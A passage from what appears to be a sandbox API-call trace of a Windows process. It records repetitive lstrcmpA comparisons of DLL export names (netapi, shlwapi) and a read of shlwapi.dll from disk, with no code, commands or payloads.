lpString2="I_BrowserResetNetlogonState") returned 1 [0263.626] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_BrowserResetStatistics") returned 1 [0263.626] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_BrowserServerEnum") returned 1 [0263.626] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_BrowserSetNetlogonState") returned 1 [0263.626] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_DsUpdateReadOnlyServerDnsRecords") returned 1 [0263.626] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetAccountDeltas") returned 1 [0263.627] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetAccountSync") returned 1 [0263.627] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetChainSetClientAttributes") returned 1 [0263.627] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetChainSetClientAttributes2") returned 1 [0263.627] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetDatabaseDeltas") returned 1 [0263.627] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetDatabaseRedo") returned 1 [0263.627] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetDatabaseSync") returned 1 [0263.627] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetDatabaseSync2") returned 1 [0263.627] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetDfsGetVersion") returned 1 [0263.627] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetDfsIsThisADomainName") returned 1 [0263.627] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetGetDCList") returned 1 [0263.627] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetGetForestTrustInformation") returned 1 [0263.627] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetLogonControl") returned 1 [0263.627] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetLogonControl2") returned 1 [0263.627] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetLogonGetDomainInfo") returned 1 [0263.627] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetLogonSamLogoff") returned 1 [0263.627] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetLogonSamLogon") returned 1 [0263.628] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetLogonSamLogonEx") returned 1 [0263.628] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetLogonSamLogonWithFlags") returned 1 [0263.628] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetLogonSendToSam") returned 1 [0263.628] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetLogonUasLogoff") returned 1 [0263.628] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetLogonUasLogon") returned 1 [0263.628] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerAuthenticate") returned 1 [0263.628] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerAuthenticate2") returned 1 [0263.628] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerAuthenticate3") returned 1 [0263.628] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerGetTrustInfo") returned 1 [0263.628] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerPasswordGet") returned 1 [0263.628] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerPasswordSet") returned 1 [0263.628] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerPasswordSet2") returned 1 [0263.628] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerReqChallenge") returned 1 [0263.628] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerSetServiceBits") returned 1 [0263.628] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerSetServiceBitsEx") returned 1 [0263.628] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerTrustPasswordsGet") returned 1 [0263.628] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetlogonComputeClientDigest") returned 1 [0263.628] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetlogonComputeServerDigest") returned 1 [0263.628] lstrcmpA (lpString1="NetAccessEnum", lpString2="NetAccessAdd") returned 1 [0263.628] lstrcmpA (lpString1="NetAccessEnum", lpString2="NetAccessDel") returned 1 [0263.628] lstrcmpA (lpString1="NetAccessEnum", lpString2="NetAccessEnum") returned 0 [0263.628] lstrcmpA (lpString1="NetAccessGetInfo", lpString2="DavAddConnection") returned 1 [0263.628] lstrcmpA (lpString1="NetAccessGetInfo", lpString2="DavDeleteConnection") returned 1 [0263.628] lstrcmpA (lpString1="NetAccessGetInfo", lpString2="DavFlushFile") returned 1 [0263.629] lstrcmpA (lpString1="NetAccessGetInfo", lpString2="DavGetExtendedError") returned 1 [0263.629] lstrcmpA (lpString1="NetAccessGetInfo", lpString2="DavGetHTTPFromUNCPath") returned 1 [0263.629] lstrcmpA (lpString1="NetAccessGetInfo", lpString2="DavGetUNCFromHTTPPath") returned 1 [0263.629] lstrcmpA (lpString1="NetAccessGetInfo", lpString2="DsAddressToSiteNamesA") returned 1 [0263.629] lstrcmpA (lpString1="NetAccessGetInfo", lpString2="DsAddressToSiteNamesExA") returned 1 [0263.629] lstrcmpA (lpString1="NetAccessGetInfo", lpString2="DsAddressToSiteNamesExW") returned 1 [0263.634] GetProcessHeap () returned 0x4a0000 [0263.634] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x2d95030 | out: hHeap=0x4a0000) returned 1 [0263.634] GetProcessHeap () returned 0x4a0000 [0263.634] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x10) returned 0x4b92e0 [0263.634] LoadLibraryA (lpLibFileName="Shlwapi.dll") returned 0x7ffc5e7b0000 [0263.636] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0263.636] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0263.637] GetModuleFileNameA (in: hModule=0x7ffc5e7b0000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll")) returned 0x1f [0263.637] CreateFileA (lpFileName="C:\\Windows\\system32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0263.637] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0263.639] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0263.639] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=332104) returned 1 [0263.639] GetProcessHeap () returned 0x4a0000 [0263.639] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x51148) returned 0x2d95030 [0263.639] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0263.639] ReadFile (in: hFile=0x17c, lpBuffer=0x2d95030, nNumberOfBytesToRead=0x51148, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x2d95030*, lpNumberOfBytesRead=0x14f5a4*=0x51148, lpOverlapped=0x0) returned 1 [0263.644] CloseHandle (hObject=0x17c) returned 1 [0263.644] lstrcmpA (lpString1="AssocCreate", lpString2="AssocCreate") returned 0 [0263.644] lstrcmpA (lpString1="AssocGetPerceivedType", lpString2="AssocCreate") returned 1 [0263.644] lstrcmpA (lpString1="AssocGetPerceivedType", lpString2="AssocGetPerceivedType") returned 0 [0263.644] lstrcmpA (lpString1="AssocIsDangerous", lpString2="AssocCreate") returned 1 [0263.644] lstrcmpA (lpString1="AssocIsDangerous", lpString2="AssocGetPerceivedType") returned 1 [0263.644] lstrcmpA (lpString1="AssocIsDangerous", lpString2="AssocIsDangerous") returned 0 [0263.645] lstrcmpA (lpString1="AssocQueryKeyA", lpString2="AssocCreate") returned 1 [0263.645] lstrcmpA (lpString1="AssocQueryKeyA", lpString2="AssocGetPerceivedType") returned 1 [0263.645] lstrcmpA (lpString1="AssocQueryKeyA", lpString2="AssocIsDangerous") returned 1 [0263.645] lstrcmpA (lpString1="AssocQueryKeyA", lpString2="AssocQueryKeyA") returned 0 [0263.645] lstrcmpA (lpString1="AssocQueryKeyW", lpString2="AssocCreate") returned 1 [0263.645] lstrcmpA (lpString1="AssocQueryKeyW", lpString2="AssocGetPerceivedType") returned 1 [0263.645] lstrcmpA (lpString1="AssocQueryKeyW", lpString2="AssocIsDangerous") returned 1 [0263.645] lstrcmpA (lpString1="AssocQueryKeyW", lpString2="AssocQueryKeyA") returned 1 [0263.645] lstrcmpA (lpString1="AssocQueryKeyW", lpString2="AssocQueryKeyW") returned 0 [0263.645] lstrcmpA (lpString1="AssocQueryStringA", lpString2="AssocCreate") returned 1 [0263.645] lstrcmpA (lpString1="AssocQueryStringA", lpString2="AssocGetPerceivedType") returned 1 [0263.645] lstrcmpA (lpString1="AssocQueryStringA", lpString2="AssocIsDangerous") returned 1 [0263.645] lstrcmpA (lpString1="AssocQueryStringA", lpString2="AssocQueryKeyA") returned 1 [0263.645] lstrcmpA (lpString1="AssocQueryStringA", lpString2="AssocQueryKeyW") returned 1 [0263.645] lstrcmpA (lpString1="AssocQueryStringA", lpString2="AssocQueryStringA") returned 0 [0263.645] lstrcmpA (lpString1="AssocQueryStringByKeyA", lpString2="AssocCreate") returned 1 [0263.645] lstrcmpA (lpString1="AssocQueryStringByKeyA", lpString2="AssocGetPerceivedType") returned 1 [0263.645] lstrcmpA (lpString1="AssocQueryStringByKeyA", lpString2="AssocIsDangerous") returned 1 [0263.645] lstrcmpA (lpString1="AssocQueryStringByKeyA", lpString2="AssocQueryKeyA") returned 1 [0263.645] lstrcmpA (lpString1="AssocQueryStringByKeyA", lpString2="AssocQueryKeyW") returned 1 [0263.645] lstrcmpA (lpString1="AssocQueryStringByKeyA", lpString2="AssocQueryStringA") returned 1 [0263.645] lstrcmpA (lpString1="AssocQueryStringByKeyA", lpString2="AssocQueryStringByKeyA") returned 0 [0263.645] lstrcmpA (lpString1="AssocQueryStringByKeyW", lpString2="AssocCreate") returned 1 [0263.645] lstrcmpA (lpString1="AssocQueryStringByKeyW", lpString2="AssocGetPerceivedType") returned 1 [0263.645] lstrcmpA (lpString1="AssocQueryStringByKeyW", lpString2="AssocIsDangerous") returned 1 [0263.645] lstrcmpA (lpString1="AssocQueryStringByKeyW", lpString2="AssocQueryKeyA") returned 1 [0263.645] lstrcmpA (lpString1="AssocQueryStringByKeyW", lpString2="AssocQueryKeyW") returned 1 [0263.645] lstrcmpA (lpString1="AssocQueryStringByKeyW", lpString2="AssocQueryStringA") returned 1 [0263.645] lstrcmpA (lpString1="AssocQueryStringByKeyW", lpString2="AssocQueryStringByKeyA") returned 1 [0263.646] lstrcmpA (lpString1="AssocQueryStringByKeyW", lpString2="AssocQueryStringByKeyW") returned 0 [0263.646] lstrcmpA (lpString1="AssocQueryStringW", lpString2="AssocCreate") returned 1 [0263.646] lstrcmpA (lpString1="AssocQueryStringW", lpString2="AssocGetPerceivedType") returned 1 [0263.646] lstrcmpA (lpString1="AssocQueryStringW", lpString2="AssocIsDangerous") returned 1 [0263.646] lstrcmpA (lpString1="AssocQueryStringW", lpString2="AssocQueryKeyA") returned 1 [0263.646] lstrcmpA (lpString1="AssocQueryStringW", lpString2="AssocQueryKeyW") returned 1 [0263.646] lstrcmpA (lpString1="AssocQueryStringW", lpString2="AssocQueryStringA") returned 1 [0263.646] lstrcmpA (lpString1="AssocQueryStringW", lpString2="AssocQueryStringByKeyA") returned 1 [0263.646] lstrcmpA (lpString1="AssocQueryStringW", lpString2="AssocQueryStringByKeyW") returned 1 [0263.646] lstrcmpA (lpString1="AssocQueryStringW", lpString2="AssocQueryStringW") returned 0 [0263.646] lstrcmpA (lpString1="ChrCmpIA", lpString2="AssocCreate") returned 1 [0263.646] lstrcmpA (lpString1="ChrCmpIA", lpString2="AssocGetPerceivedType") returned 1 [0263.646] lstrcmpA (lpString1="ChrCmpIA", lpString2="AssocIsDangerous") returned 1 [0263.646] lstrcmpA (lpString1="ChrCmpIA", lpString2="AssocQueryKeyA") returned 1 [0263.646] lstrcmpA (lpString1="ChrCmpIA", lpString2="AssocQueryKeyW") returned 1 [0263.646] lstrcmpA (lpString1="ChrCmpIA", lpString2="AssocQueryStringA") returned 1 [0263.646] lstrcmpA (lpString1="ChrCmpIA", lpString2="AssocQueryStringByKeyA") returned 1 [0263.646] lstrcmpA (lpString1="ChrCmpIA", lpString2="AssocQueryStringByKeyW") returned 1 [0263.646] lstrcmpA (lpString1="ChrCmpIA", lpString2="AssocQueryStringW") returned 1 [0263.646] lstrcmpA (lpString1="ChrCmpIA", lpString2="ChrCmpIA") returned 0 [0263.647] lstrcmpA (lpString1="ChrCmpIW", lpString2="AssocCreate") returned 1 [0263.647] lstrcmpA (lpString1="ChrCmpIW", lpString2="AssocGetPerceivedType") returned 1 [0263.647] lstrcmpA (lpString1="ChrCmpIW", lpString2="AssocIsDangerous") returned 1 [0263.647] lstrcmpA (lpString1="ChrCmpIW", lpString2="AssocQueryKeyA") returned 1 [0263.647] lstrcmpA (lpString1="ChrCmpIW", lpString2="AssocQueryKeyW") returned 1 [0263.647] lstrcmpA (lpString1="ChrCmpIW", lpString2="AssocQueryStringA") returned 1 [0263.647] lstrcmpA (lpString1="ChrCmpIW", lpString2="AssocQueryStringByKeyA") returned 1 [0263.647] lstrcmpA (lpString1="ChrCmpIW", lpString2="AssocQueryStringByKeyW") returned 1 [0263.647] lstrcmpA (lpString1="ChrCmpIW", lpString2="AssocQueryStringW") returned 1 [0263.647] lstrcmpA (lpString1="ChrCmpIW", lpString2="ChrCmpIA") returned 1 [0263.647] lstrcmpA (lpString1="ChrCmpIW", lpString2="ChrCmpIW") returned 0 [0263.647] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="AssocCreate") returned 1 [0263.647] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="AssocGetPerceivedType") returned 1 [0263.647] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="AssocIsDangerous") returned 1 [0263.647] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="AssocQueryKeyA") returned 1 [0263.647] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="AssocQueryKeyW") returned 1 [0263.647] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="AssocQueryStringA") returned 1 [0263.647] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="AssocQueryStringByKeyA") returned 1 [0263.647] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="AssocQueryStringByKeyW") returned 1 [0263.647] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="AssocQueryStringW") returned 1 [0263.647] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="ChrCmpIA") returned 1 [0263.647] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="ChrCmpIW") returned 1 [0263.647] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="ColorAdjustLuma") returned 0 [0263.647] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="AssocCreate") returned 1 [0263.648] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="AssocGetPerceivedType") returned 1 [0263.648] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="AssocIsDangerous") returned 1 [0263.648] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="AssocQueryKeyA") returned 1 [0263.648] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="AssocQueryKeyW") returned 1 [0263.648] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="AssocQueryStringA") returned 1 [0263.648] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="AssocQueryStringByKeyA") returned 1 [0263.648] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="AssocQueryStringByKeyW") returned 1 [0263.648] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="AssocQueryStringW") returned 1 [0263.648] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="ChrCmpIA") returned 1 [0263.648] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="ChrCmpIW") returned 1 [0263.648] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="ColorAdjustLuma") returned 1 [0263.648] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="ColorHLSToRGB") returned 0 [0263.648] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="AssocCreate") returned 1 [0263.648] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="AssocGetPerceivedType") returned 1 [0263.648] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="AssocIsDangerous") returned 1 [0263.648] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="AssocQueryKeyA") returned 1 [0263.648] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="AssocQueryKeyW") returned 1 [0263.648] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="AssocQueryStringA") returned 1 [0263.648] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="AssocQueryStringByKeyA") returned 1 [0263.648] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="AssocQueryStringByKeyW") returned 1 [0263.648] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="AssocQueryStringW") returned 1 [0263.648] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="ChrCmpIA") returned 1 [0263.648] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="ChrCmpIW") returned 1 [0263.648] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="ColorAdjustLuma") returned 1 [0263.649] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="ColorHLSToRGB") returned 1 [0263.649] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="ColorRGBToHLS") returned 0 [0263.649] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="AssocCreate") returned 1 [0263.649] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="AssocGetPerceivedType") returned 1 [0263.649] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="AssocIsDangerous") returned 1 [0263.649] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="AssocQueryKeyA") returned 1 [0263.649] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="AssocQueryKeyW") returned 1 [0263.649] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="AssocQueryStringA") returned 1 [0263.649] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="AssocQueryStringByKeyA") returned 1 [0263.649] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="AssocQueryStringByKeyW") returned 1 [0263.649] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="AssocQueryStringW") returned 1 [0263.649] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="ChrCmpIA") returned 1 [0263.649] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="ChrCmpIW") returned 1 [0263.649] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="ColorAdjustLuma") returned 1 [0263.649] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="ColorHLSToRGB") returned 1 [0263.649] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="ColorRGBToHLS") returned 1 [0263.649] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="ConnectToConnectionPoint") returned 0 [0263.649] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="AssocCreate") returned 1 [0263.649] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="AssocGetPerceivedType") returned 1 [0263.649] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="AssocIsDangerous") returned 1 [0263.649] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="AssocQueryKeyA") returned 1 [0263.649] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="AssocQueryKeyW") returned 1 [0263.649] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="AssocQueryStringA") returned 1 [0263.649] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="AssocQueryStringByKeyA") returned 1 [0263.649] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="AssocQueryStringByKeyW") returned 1 [0263.649] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="AssocQueryStringW") returned 1 [0263.649] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="ChrCmpIA") returned 1 [0263.649] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="ChrCmpIW") returned 1 [0263.649] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="ColorAdjustLuma") returned 1 [0263.650] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="ColorHLSToRGB") returned 1 [0263.650] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="ColorRGBToHLS") returned 1 [0263.650] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="ConnectToConnectionPoint") returned 1 [0263.650] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="DelayLoadFailureHook") returned 0 [0263.650] lstrcmpA (lpString1="DllGetClassObject", lpString2="AssocCreate") returned 1 [0263.650] lstrcmpA (lpString1="DllGetClassObject", lpString2="AssocGetPerceivedType") returned 1 [0263.650] lstrcmpA (lpString1="DllGetClassObject", lpString2="AssocIsDangerous") returned 1 [0263.650] lstrcmpA (lpString1="DllGetClassObject", lpString2="AssocQueryKeyA") returned 1 [0263.650] lstrcmpA (lpString1="DllGetClassObject", lpString2="AssocQueryKeyW") returned 1 [0263.650] lstrcmpA (lpString1="DllGetClassObject", lpString2="AssocQueryStringA") returned 1 [0263.650] lstrcmpA (lpString1="DllGetClassObject", lpString2="AssocQueryStringByKeyA") returned 1 [0263.650] lstrcmpA (lpString1="DllGetClassObject", lpString2="AssocQueryStringByKeyW") returned 1 [0263.650] lstrcmpA (lpString1="DllGetClassObject", lpString2="AssocQueryStringW") returned 1 [0263.650] lstrcmpA (lpString1="DllGetClassObject", lpString2="ChrCmpIA") returned 1 [0263.650] lstrcmpA (lpString1="DllGetClassObject", lpString2="ChrCmpIW") returned 1 [0263.650] lstrcmpA (lpString1="DllGetClassObject", lpString2="ColorAdjustLuma") returned 1 [0263.650] lstrcmpA (lpString1="DllGetClassObject", lpString2="ColorHLSToRGB") returned 1 [0263.650] lstrcmpA (lpString1="DllGetClassObject", lpString2="ColorRGBToHLS") returned 1 [0263.650] lstrcmpA (lpString1="DllGetClassObject", lpString2="ConnectToConnectionPoint") returned 1 [0263.650] lstrcmpA (lpString1="DllGetClassObject", lpString2="DelayLoadFailureHook") returned 1 [0263.650] lstrcmpA (lpString1="DllGetClassObject", lpString2="DllGetClassObject") returned 0 [0263.650] lstrcmpA (lpString1="DllGetVersion", lpString2="AssocCreate") returned 1 [0263.650] lstrcmpA (lpString1="DllGetVersion", lpString2="AssocGetPerceivedType") returned 1 [0263.650] lstrcmpA (lpString1="DllGetVersion", lpString2="AssocIsDangerous") returned 1 [0263.650] lstrcmpA (lpString1="DllGetVersion", lpString2="AssocQueryKeyA") returned 1 [0263.651] lstrcmpA (lpString1="DllGetVersion", lpString2="AssocQueryKeyW") returned 1 [0263.651] lstrcmpA (lpString1="DllGetVersion", lpString2="AssocQueryStringA") returned 1 [0263.651] lstrcmpA (lpString1="DllGetVersion", lpString2="AssocQueryStringByKeyA") returned 1 [0263.651] lstrcmpA (lpString1="DllGetVersion", lpString2="AssocQueryStringByKeyW") returned 1 [0263.651] lstrcmpA (lpString1="DllGetVersion", lpString2="AssocQueryStringW") returned 1 [0263.651] lstrcmpA (lpString1="DllGetVersion", lpString2="ChrCmpIA") returned 1 [0263.651] lstrcmpA (lpString1="DllGetVersion", lpString2="ChrCmpIW") returned 1 [0263.651] lstrcmpA (lpString1="DllGetVersion", lpString2="ColorAdjustLuma") returned 1 [0263.651] lstrcmpA (lpString1="DllGetVersion", lpString2="ColorHLSToRGB") returned 1 [0263.651] lstrcmpA (lpString1="DllGetVersion", lpString2="ColorRGBToHLS") returned 1 [0263.651] lstrcmpA (lpString1="DllGetVersion", lpString2="ConnectToConnectionPoint") returned 1 [0263.651] lstrcmpA (lpString1="DllGetVersion", lpString2="DelayLoadFailureHook") returned 1 [0263.651] lstrcmpA (lpString1="DllGetVersion", lpString2="DllGetClassObject") returned 1 [0263.651] lstrcmpA (lpString1="DllGetVersion", lpString2="DllGetVersion") returned 0 [0263.651] lstrcmpA (lpString1="GUIDFromStringW", lpString2="AssocCreate") returned 1 [0263.651] lstrcmpA (lpString1="GUIDFromStringW", lpString2="AssocGetPerceivedType") returned 1 [0263.651] lstrcmpA (lpString1="GUIDFromStringW", lpString2="AssocIsDangerous") returned 1 [0263.651] lstrcmpA (lpString1="GUIDFromStringW", lpString2="AssocQueryKeyA") returned 1 [0263.651] lstrcmpA (lpString1="GUIDFromStringW", lpString2="AssocQueryKeyW") returned 1 [0263.651] lstrcmpA (lpString1="GUIDFromStringW", lpString2="AssocQueryStringA") returned 1 [0263.651] lstrcmpA (lpString1="GUIDFromStringW", lpString2="AssocQueryStringByKeyA") returned 1 [0263.651] lstrcmpA (lpString1="GUIDFromStringW", lpString2="AssocQueryStringByKeyW") returned 1 [0263.651] lstrcmpA (lpString1="GUIDFromStringW", lpString2="AssocQueryStringW") returned 1 [0263.651] lstrcmpA (lpString1="GUIDFromStringW", lpString2="ChrCmpIA") returned 1 [0263.651] lstrcmpA (lpString1="GUIDFromStringW", lpString2="ChrCmpIW") returned 1 [0263.651] lstrcmpA (lpString1="GUIDFromStringW", lpString2="ColorAdjustLuma") returned 1 [0263.651] lstrcmpA (lpString1="GUIDFromStringW", lpString2="ColorHLSToRGB") returned 1 [0263.651] lstrcmpA (lpString1="GUIDFromStringW", lpString2="ColorRGBToHLS") returned 1 [0263.651] lstrcmpA (lpString1="GUIDFromStringW", lpString2="ConnectToConnectionPoint") returned 1 [0263.652] lstrcmpA (lpString1="GUIDFromStringW", lpString2="DelayLoadFailureHook") returned 1 [0263.652] lstrcmpA (lpString1="GUIDFromStringW", lpString2="DllGetClassObject") returned 1 [0263.652] lstrcmpA (lpString1="GUIDFromStringW", lpString2="DllGetVersion") returned 1 [0263.652] lstrcmpA (lpString1="GUIDFromStringW", lpString2="GUIDFromStringW") returned 0 [0263.652] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="AssocCreate") returned 1 [0263.652] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="AssocGetPerceivedType") returned 1 [0263.652] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="AssocIsDangerous") returned 1 [0263.652] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="AssocQueryKeyA") returned 1 [0263.652] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="AssocQueryKeyW") returned 1 [0263.652] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="AssocQueryStringA") returned 1 [0263.652] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="AssocQueryStringByKeyA") returned 1 [0263.652] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="AssocQueryStringByKeyW") returned 1 [0263.652] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="AssocQueryStringW") returned 1 [0263.652] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="ChrCmpIA") returned 1 [0263.652] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="ChrCmpIW") returned 1 [0263.652] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="ColorAdjustLuma") returned 1 [0263.652] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="ColorHLSToRGB") returned 1 [0263.652] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="ColorRGBToHLS") returned 1 [0263.652] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="ConnectToConnectionPoint") returned 1 [0263.652] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="DelayLoadFailureHook") returned 1 [0263.652] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="DllGetClassObject") returned 1 [0263.652] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="DllGetVersion") returned 1 [0263.652] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="GUIDFromStringW") returned -1 [0263.652] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="GetAcceptLanguagesA") returned 0 [0263.652] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="AssocCreate") returned 1 [0263.652] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="AssocGetPerceivedType") returned 1 [0263.652] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="AssocIsDangerous") returned 1 [0263.652] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="AssocQueryKeyA") returned 1 [0263.652] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="AssocQueryKeyW") returned 1 [0263.652] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="AssocQueryStringA") returned 1 [0263.652] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="AssocQueryStringByKeyA") returned 1 [0263.653] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="AssocQueryStringByKeyW") returned 1 [0263.653] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="AssocQueryStringW") returned 1 [0263.653] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="ChrCmpIA") returned 1 [0263.653] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="ChrCmpIW") returned 